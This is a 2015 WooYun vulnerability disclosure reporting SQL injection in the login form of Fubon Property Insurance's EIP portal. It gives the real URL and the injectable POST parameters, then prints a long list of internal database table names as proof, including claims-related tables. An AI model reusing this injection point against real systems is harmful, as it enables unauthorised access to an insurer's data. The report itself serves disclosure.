当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141901

漏洞标题:富邦财险某系统SQL注入(16个敏感库设计14000+数据表)

相关厂商:富邦财险

漏洞作者: 路人甲

提交时间:2015-09-22 07:37

修复时间:2015-09-27 07:38

公开时间:2015-09-27 07:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-22: 细节已通知厂商并且等待厂商处理中
2015-09-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

1万多表的寂寞你能懂

详细说明:

问题站点:https://eip.fubon.com.cn/
登录处存在sql注入

https://eip.fubon.com.cn/Login.aspx
post:IDD=admin*&Password=11111&x=43&y=31&CharSet=UTF-8&SYSTEM_CharSet=UTF-8


12.png


当前库:PowerEIP,太多了我就贴一部分

Database: PowerEIP
[14177 tables]
+--------------------------------+
| AD_ChangeD |
| AD_ChangeM |
| B_SA_Temp |
| Budget |
| BudgetLevelDetailShowTable |
| BudgetLevelShowTable |
| Budget_Bank |
| Budget_Borrow |
| Budget_DeptMember |
| Budget_EIP_SA_Dept |
| Budget_FeeApply_Detail |
| Budget_FeeShare_Detail |
| Budget_Fin_Peop |
| Budget_Form |
| Budget_Group |
| Budget_INS |
| Budget_Info |
| Budget_Item |
| Budget_Money_Flow |
| Budget_NShare_Ppls |
| Budget_Permission |
| Budget_Pre_Record |
| Budget_ReP |
| Budget_SA_D |
| Budget_SA_T |
| Budget_SA_Temp |
| Budget_Shift_Detail |
| Budget_SignFlow |
| Budget_TREF_Count |
| CCYInfo |
| CODE1 |
| CODE5 |
| CPAPR18M |
| C_bibe |
| CarData |
| CarPosition |
| CarReason |
| Dep_Booking_file |
| Dep_Booking_sign |
| Dep_Task_Power |
| Dep_Task_booking |
| Dep_task |
| Dep_task_date |
| Dep_task_file |
| DisCuss_Content |
| Discuss_Subject |
| Discuss_staff |
| EInForm_Style |
| Eip_DispID |
| Overtime_Reserve |
| Set_Account2 |
| T_bankInfo |
| V_bmb01 |
| V_bme021 |
| key_fx重大赔案2014_04_25 |
| key_fx重大赔案2014_10_09 |
| key_fx重大赔案2014_11_11 |
| key_fx重大赔案2014_11_12 |
| key_fx重大赔案2014_11_18 |
| key_fx重大赔案2014_11_23 |
| key_fx重大赔案2015_01_21 |
| key_fx重大赔案2015_01_30 |
| key_fx重大赔案2015_02_04 |
| key_fx重大赔案2015_02_06 |
| key_fx重大赔案2015_02_09 |
| key_fx重大赔案2015_03_25 |
| key_fx重大赔案2015_05_04 |
| key_fx重大赔案2015_05_07 |
| key_fx重大赔案2015_05_09 |
| key_fx重大赔案2015_07_07 |
| key_fx重大赔案2015_07_09 |
| key_fx重大赔案2015_07_15 |
| key_fx重大赔案2015_07_16 |
| key_fx重大赔案2015_07_22 |
| key_fx重大赔案2015_07_28 |
| key_fx重大赔案2015_08_10 |
| key_fx重大赔案2015_09_04 |
| key_fx重大赔案2015_09_16 |
| key_jz重大赔案2014_04_28 |
| key_jz重大赔案2014_05_19 |
| key_jz重大赔案2014_05_20 |
| key_jz重大赔案2014_05_21 |
| key_jz重大赔案2014_06_13 |
| key_jz重大赔案2014_06_17 |
| key_jz重大赔案2014_08_22 |
| key_jz重大赔案2014_08_29 |
| key_jz重大赔案2014_09_02 |
| key_jz重大赔案2014_09_16 |
| key_jz重大赔案2014_09_19 |
| key_jz重大赔案2014_11_11 |
| key_jz重大赔案2014_11_24 |
| key_jz重大赔案2014_12_22 |
| key_jz重大赔案2014_12_23 |
| key_jz重大赔案2014_12_31 |
| key_jz重大赔案2015_01_13 |
| key_jz重大赔案2015_01_23 |
| key_jz重大赔案2015_02_09 |
| key_jz重大赔案2015_02_10 |
| key_jz重大赔案2015_02_11 |
| key_jz重大赔案2015_02_26 |
| key_jz重大赔案2015_03_02 |
| key_jz重大赔案2015_03_06 |
| key_jz重大赔案2015_03_13 |
| key_jz重大赔案2015_04_08 |
| key_jz重大赔案2015_04_20 |
| key_jz重大赔案2015_04_22 |
| key_jz重大赔案2015_05_11 |
| key_jz重大赔案2015_05_20 |
| key_jz重大赔案2015_06_02 |
| key_jz重大赔案2015_06_05 |
| key_jz重大赔案2015_06_09 |
| key_jz重大赔案2015_06_12 |
| key_jz重大赔案2015_06_16 |
| key_jz重大赔案2015_06_17 |
| key_jz重大赔案2015_06_18 |
| key_jz重大赔案2015_06_24 |
| key_jz重大赔案2015_06_30 |
| key_jz重大赔案2015_07_02 |
| key_jz重大赔案2015_07_07 |
| key_jz重大赔案2015_07_13 |
| key_jz重大赔案2015_07_15 |
| key_jz重大赔案2015_08_06 |
| key_jz重大赔案2015_08_07 |
| key_jz重大赔案2015_08_10 |
| key_jz重大赔案2015_08_12 |
| key_jz重大赔案2015_08_28 |
| key_jz重大赔案2015_09_03 |
| key_jz重大赔案2015_09_09 |
| key_jz重大赔案2015_09_11 |
| key_sql执行单2012_01_13 |
| key_sql执行单2012_02_22 |
| key_sql执行单2012_03_16 |
| key_sql执行单2012_03_20 |
| key_sql执行单2012_03_31 |
| key_sql执行单2012_04_10 |
| key_sql执行单2012_04_11 |
| key_sql执行单2012_04_12 |
| key_sql执行单2012_04_23 |
| key_sql执行单2012_04_25 |
| key_sql执行单2012_05_03 |
| key_sql执行单2012_05_09 |
| key_sql执行单2012_05_10 |
| key_sql执行单2012_05_17 |
| key_sql执行单2012_05_18 |
| key_sql执行单2012_05_21 |
| key_sql执行单2012_05_23 |
| key_sql执行单2012_05_24 |
| key_sql执行单2012_06_05 |
| key_sql执行单2012_06_07 |
| key_sql执行单2012_06_11 |
| key_sql执行单2012_06_15 |
| key_sql执行单2012_06_20 |
| key_sql执行单2012_06_28 |
| key_sql执行单2012_06_29 |
| key_sql执行单2012_07_02 |
| key_sql执行单2012_07_05 |
| key_sql执行单2012_07_06 |
| key_sql执行单2012_07_23 |
| key_sql执行单2012_08_27 |
| key_sql执行单2012_08_28 |
| key_sql执行单2012_09_03 |
| key_sql执行单2012_11_01 |
| key_sql执行单2012_11_07 |
| key_sql执行单2012_11_08 |
| key_sql执行单2012_11_09 |
| key_sql执行单2012_12_13 |
| key_sql执行单2013_01_16 |
| key_sql执行单2013_01_31 |
| key_sql执行单2013_02_07 |
| key_sql执行单2013_02_18 |
| key_sql执行单2013_02_27 |
| key_sql执行单2013_02_28 |
| key_sql执行单2013_03_08 |
| key_sql执行单2013_03_11 |
| key_sql执行单2013_03_13 |
| key_sql执行单2013_03_15 |
| key_sql执行单2013_03_18 |
| key_sql执行单2013_03_19 |
| key_sql执行单2013_03_20 |
| key_sql执行单2013_03_25 |
| key_sql执行单2013_03_29 |
| key_sql执行单2013_04_10 |
| key_sql执行单2013_04_12 |
| key_sql执行单2013_04_16 |
| key_sql执行单2013_04_23 |
| key_sql执行单2013_04_24 |
| key_sql执行单2013_04_28 |
| key_sql执行单2013_05_02 |
| key_sql执行单2013_05_03 |
| key_sql执行单2013_05_06 |
| key_sql执行单2013_05_07 |
| key_sql执行单2013_05_10 |
| key_sql执行单2013_05_16 |
| key_sql执行单2013_05_17 |
| key_sql执行单2013_05_20 |
| key_sql执行单2013_05_21 |
| key_sql执行单2013_05_22 |
| key_sql执行单2013_06_06 |
| key_sql执行单2013_06_07 |
| key_sql执行单2013_06_08 |
| key_sql执行单2013_06_14 |
| key_sql执行单2013_06_17 |
| key_sql执行单2013_06_21 |
| key_sql执行单2013_06_27 |
| key_sql执行单2013_07_05 |
| key_sql执行单2013_07_10 |
| key_sql执行单2013_07_30 |
| key_sql执行单2013_08_05 |
| key_sql执行单2013_08_07 |
| key_sql执行单2013_08_09 |
| key_sql执行单2013_08_12 |
| key_sql执行单2013_09_03 |
| key_sql执行单2013_09_10 |
| key_sql执行单2013_09_23 |
| key_sql执行单2013_10_08 |
| key_sql执行单2013_10_28 |
| key_sql执行单2013_10_30 |
| key_sql执行单2013_11_01 |
| key_sql执行单2013_11_04 |
| key_sql执行单2013_11_08 |
| key_sql执行单2013_11_11 |
| key_sql执行单2013_11_13 |
| key_sql执行单2013_11_18 |
| key_sql执行单2013_11_19 |
| key_sql执行单2013_11_22 |
| key_sql执行单2013_11_29 |
| key_sql执行单2013_12_05 |
| key_sql执行单2013_12_06 |
| key_sql执行单2013_12_09 |
| key_sql执行单2013_12_12 |
| key_sql执行单2013_12_13 |
| key_sql执行单2013_12_18 |
| key_sql执行单2013_12_19 |
| key_sql执行单2013_12_24 |
| key_sql执行单2013_12_26 |
| key_sql执行单2013_12_30 |
| key_sql执行单2013_12_31 |
| key_sql执行单2014_01_07 |
| key_sql执行单2014_01_08 |
| key_sql执行单2014_01_09 |
| key_sql执行单2014_01_13 |
| key_sql执行单2014_01_15 |
| key_sql执行单2014_01_20 |
| key_sql执行单2014_01_22 |
| key_sql执行单2014_01_24 |
| key_sql执行单2014_01_26 |
| key_sql执行单2014_01_27 |
| key_sql执行单2014_02_13 |
| key_sql执行单2014_02_24 |
| key_sql执行单2014_02_25 |
| key_sql执行单2014_02_26 |
| key_sql执行单2014_02_28 |
| key_sql执行单2014_03_05 |
| key_sql执行单2014_03_06 |
| key_sql执行单2014_03_11 |
| key_sql执行单2014_03_12 |
| key_sql执行单2014_03_13 |
| key_sql执行单2014_03_14 |
| key_sql执行单2014_03_20 |
| key_sql执行单2014_03_21 |
| key_sql执行单2014_03_26 |
| key_sql执行单2014_03_27 |
| key_sql执行单2014_04_01 |
| key_sql执行单2014_04_03 |
| key_sql执行单2014_04_18 |
| key_sql执行单2014_04_22 |
| key_sql执行单2014_04_25 |
| key_sql执行单2014_04_28 |
| key_sql执行单2014_04_30 |
| key_sql执行单2014_05_04 |
| key_sql执行单2014_05_05 |
| key_sql执行单2014_05_06 |
| key_sql执行单2014_05_09 |
| key_sql执行单2014_05_15 |
| key_sql执行单2014_05_16 |
| key_sql执行单2014_05_20 |
| key_sql执行单2014_05_22 |
| key_sql执行单2014_05_26 |
| key_sql执行单2014_06_06 |
| key_sql执行单2014_06_12 |
| key_sql执行单2014_06_17 |
| key_sql执行单2014_06_20 |
| key_sql执行单2014_06_24 |
| key_sql执行单2014_06_30 |
| key_sql执行单2014_07_02 |
| key_sql执行单2014_07_08 |
| key_sql执行单2014_07_09 |
| key_sql执行单2014_07_24 |
| key_sql执行单2014_07_25 |
| key_sql执行单2014_07_28 |
| key_sql执行单2014_07_29 |
| key_sql执行单2014_07_30 |
| key_sql执行单2014_07_31 |
| key_sql执行单2014_08_01 |
| key_sql执行单2014_08_04 |
| key_sql执行单2014_08_05 |
| key_sql执行单2014_08_06 |
| key_sql执行单2014_08_08 |
| key_sql执行单2014_08_12 |
| key_sql执行单2014_08_13 |
| key_sql执行单2014_08_14 |
| key_sql执行单2014_08_19 |
| key_sql执行单2014_08_27 |
| key_sql执行单2014_08_28 |
| key_sql执行单2014_09_02 |
| key_sql执行单2014_09_05 |
| key_sql执行单2014_09_25 |
| key_sql执行单2014_10_23 |
| key_sql执行单2014_10_28 |
| key_sql执行单2014_10_31 |
| key_sql执行单2014_11_04 |
| key_sql执行单2014_11_20 |
| key_sql执行单2014_11_25 |
| key_sql执行单2014_11_28 |
| key_sql执行单2014_12_01 |
| key_sql执行单2014_12_10 |
| key_sql执行单2014_12_12 |
| key_sql执行单2014_12_17 |
| key_sql执行单2014_12_23 |
| key_sql执行单2014_12_29 |
| key_sql执行单2014_12_31 |
| key_sql执行单2015_01_06 |
| key_sql执行单2015_01_15 |
| key_sql执行单2015_01_21 |


漏洞证明:

13.png

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-27 07:38

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无